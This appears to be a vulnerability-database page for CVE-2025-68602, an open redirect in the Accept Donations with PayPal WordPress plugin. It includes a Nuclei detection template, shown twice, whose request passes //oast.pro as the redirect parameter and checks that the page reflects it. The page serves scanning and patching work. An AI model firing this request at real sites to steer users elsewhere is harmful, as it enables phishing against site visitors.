Accept Donations with PayPal <= 1.5.2 - Open Redirect

CVE-2025-68602

Verified

Description

The Accept Donations with PayPal & Stripe plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 1.5.2. This is due to insufficient validation on the redirect url supplied. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.

Severity

Medium

CVSS Score

4.7

Exploit Probability

Published Date

March 17, 2026

Template Author

shivam kamboj

CVE-2025-68602.yaml

id: CVE-2025-68602

info:
  name: Accept Donations with PayPal <= 1.5.2 - Open Redirect
  author: Shivam Kamboj
  severity: medium
  description: |
    The Accept Donations with PayPal & Stripe plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 1.5.2. This is due to insufficient validation on the redirect url supplied. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.
  impact: |
    Attackers can redirect users to malicious sites, facilitating phishing attacks and credential theft.
  remediation: |
    Update to the latest version beyond 1.5.1.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-paypal-donation/accept-donations-with-paypal-152-unauthenticated-open-redirect
    - https://nvd.nist.gov/vuln/detail/CVE-2025-68602
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
    cvss-score: 4.7
    cve-id: CVE-2025-68602
    epss-score: 0.00115
    epss-percentile: 0.29653
    cwe-id: CWE-601
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2025,wordpress,wp,wp-plugin,redirect,easy-paypal-donation,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/?wpedon-stripe-checkout-redirect=1&sk=nucleitest&ai=nucleitest&si=nucleitest&rf=//oast.pro"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - 'src="https://js.stripe.com/v3/"'

      - type: word
        part: body
        words:
          - "let rf = '//oast.pro"

      - type: word
        part: body
        words:
          - "window.location.href = rf;"

    extractors:
      - type: regex
        name: open-redirect
        part: body
        regex:
          - "let rf = '([^']+)'"
# digest: 490a00463044022011f7b24cabbe4bb806d86e6eaa25364e8609ccc66330525e7d14ebe082f1ea890220450e3722ad333ee504a534f26b7463e8a6f0db41616ec0c31b4f3bf9471b5067:922c64590222798bb761d5b6d8e72950

4.7Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

CVE ID:

cve-2025-68602

CWE ID:

cwe-601

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-paypal-donation/accept-donations-with-paypal-152-unauthenticated-open-redirect https://nvd.nist.gov/vuln/detail/CVE-2025-68602

Remediation Steps

Update to the latest version beyond 1.5.1.

Description

id: CVE-2025-68602

info:
  name: Accept Donations with PayPal <= 1.5.2 - Open Redirect
  author: Shivam Kamboj
  severity: medium
  description: |
    The Accept Donations with PayPal & Stripe plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 1.5.2. This is due to insufficient validation on the redirect url supplied. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.
  impact: |
    Attackers can redirect users to malicious sites, facilitating phishing attacks and credential theft.
  remediation: |
    Update to the latest version beyond 1.5.1.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-paypal-donation/accept-donations-with-paypal-152-unauthenticated-open-redirect
    - https://nvd.nist.gov/vuln/detail/CVE-2025-68602
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
    cvss-score: 4.7
    cve-id: CVE-2025-68602
    epss-score: 0.00115
    epss-percentile: 0.29653
    cwe-id: CWE-601
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2025,wordpress,wp,wp-plugin,redirect,easy-paypal-donation,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/?wpedon-stripe-checkout-redirect=1&sk=nucleitest&ai=nucleitest&si=nucleitest&rf=//oast.pro"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - 'src="https://js.stripe.com/v3/"'

      - type: word
        part: body
        words:
          - "let rf = '//oast.pro"

      - type: word
        part: body
        words:
          - "window.location.href = rf;"

    extractors:
      - type: regex
        name: open-redirect
        part: body
        regex:
          - "let rf = '([^']+)'"
# digest: 490a00463044022011f7b24cabbe4bb806d86e6eaa25364e8609ccc66330525e7d14ebe082f1ea890220450e3722ad333ee504a534f26b7463e8a6f0db41616ec0c31b4f3bf9471b5067:922c64590222798bb761d5b6d8e72950

Accept Donations with PayPal <= 1.5.2 - Open Redirect

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Accept Donations with PayPal <= 1.5.2 - Open Redirect

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps